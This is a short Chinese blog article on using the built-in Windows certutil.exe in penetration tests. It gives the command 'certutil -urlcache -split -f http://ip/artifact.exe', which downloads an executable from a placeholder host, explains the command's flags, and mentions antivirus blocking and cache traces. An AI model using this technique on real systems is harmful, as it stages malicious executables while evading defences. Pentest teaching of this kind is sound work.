热门标签
热门文章
- 1多线程实操&&阻塞队列_后台阻塞一个线程,再次请求这个接口
- 2独家揭秘:AI漫画小说推文项目,实战攻略助你月入轻松破万_做小说推文用ai推文有收益吗
- 3opencv-python[cv2]读取中文路径图像_cv2读取中文路径
- 4银河麒麟搭建nodejs环境_麒麟系统安装node
- 5rust实战系列一百零二:Unsafe_rust什么情况下需要unsafe
- 6adb 切换usb模式_利用adb命令打开usb调试
- 7PyQt5 实现字体大小自适应分辨率的方法_python pyqt5 高dpi文字缩放
- 8当EAI遇见RPA:破解接口难题,助力数据打通_rpa实现无接口上传
- 9数论+线性dp——cf1174A
- 10JUC并发编程与源码分析笔记-目录
当前位置: article > 正文
渗透中Windows利用Certutil进行文件下载_利用certutil下载可执行文件
作者:神奇cpp | 2024-08-02 08:33:51
赞
踩
利用certutil下载可执行文件
1.概述
certutil.exe 是一个合法Windows文件,用于管理Windows证书的程序。此合法Windows服务现已被广泛滥用于恶意用途
渗透中主要利用其下载、编码、解码、替代数据流等功能
可以在命令行用certutil -?查看一下certutil所有的参数:
2.利用Certutil进行文件下载
一般最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。但是因为在下载文件的过程中也会创建进程,所以也遭到了各大杀软的拦截
certutil -urlcache -split -f http://ip/artifact.exe
- 1
参数介绍:
- -f 覆盖现有文件。有值的命令行选项。后面跟要下载的文件 url
- -split 保存到文件。无值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径
- -URLCache 显示或删除URL缓存条目。无值的命令行选项(certutil.exe 下载有个弊端,它的每一次下载都有留有缓存)
推荐阅读
相关标签
